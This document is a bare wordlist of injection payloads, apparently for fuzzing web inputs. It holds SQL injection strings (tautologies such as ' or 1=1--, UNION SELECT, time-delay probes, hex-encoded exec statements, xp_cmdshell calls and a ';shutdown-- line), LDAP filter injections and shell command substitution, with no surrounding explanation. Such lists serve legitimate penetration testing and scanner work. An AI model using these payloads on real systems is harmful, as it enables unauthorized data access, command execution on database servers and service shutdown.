 or 0=0 #"
 or 1=1 or ""=
 or a = a
 or a=a
-
--
--';
--sp_password
,@variable
!
?
'
' --
' ;
' (select top 1
' and '' like '
' AnD '' like '
' and '' like ''--
' and '' like '%
' aND '' like '%
' and 2>1--
' and 2>3--
' or '' like '
' or ''='
' or '1'='1'--
' or 'x'='x
' or (EXISTS)
' or 0=0 --
' or 0=0 #
' or 1 --'
' or 1=1
‘ or 1=1 --
' or 1=1 or ''='
' or 1=1--
' or 3=3
‘ or 3=3 --
' or a=a--
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
' UNION ALL SELECT
' UNION SELECT
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'; exec xp_regread
';shutdown--
') and ('x'='x
') or ('a'='a
') or ('x'='x
')%20or%20('x'='x
'%20or%20''='
'%20or%20'x'='x
'%20or%201=1
'||UTL_HTTP.REQUEST
'hi' or 'x'='x';
'or select *
'or''='
'or'='or'
'sqlattempt1
"
" or "a"="a
" or "x"="x
" or 0=0 --
" or 0=0 #
" or 1=1 or ""="
" or 1=1--
"' or 1 --'"
") or ("a"="a
"a"" or 1=1--"
"a"" or 3=3--"
"hi"") or (""a""=""a"
(
(sqlattempt2)
)
) and (1=1
) or (a=a
@variable
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
/
//
//*
\x23
\x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
\x27UNION SELECT
\x3D \x27
\x3D \x3B'
&
&apos;%20OR
&lt;&gt;&quot;'%;)(&amp;+
#
%20'sleep%2050'
%20$(sleep%2050)
%20or%20x=x
%21
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
<>"'%;)(&+
= --
= ;
= '
|
0 or 1=1
1 or 1=1
1 waitfor delay '0:0:10'--
1;SELECT%20*
23 OR 1=1
a'
a' or 'a' = 'a
a' or 1=1--
a' or 3=3--
a' waitfor delay '0:0:10'--
admin'--
anything' OR 'x'='x
as
asc
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
delete
desc
distinct
exec sp
exec xp
handler
having
hi or 1=1 --"
hi or a=a
hi' or 'a'='a
hi' or 1=1 --
hi') or ('a'='a
hi" or "a"="a
hi" or 1=1 --
hi") or ("a"="a
insert
like
limit
or
or 0=0 --
or 0=0 #
or 1=1--
or%201=1
or%201=1 --
order by
PRINT
PRINT @@variable
procedure
replace
select
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
update
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' or 1=1 or 'x'='y
x' OR full_name LIKE '%Bob%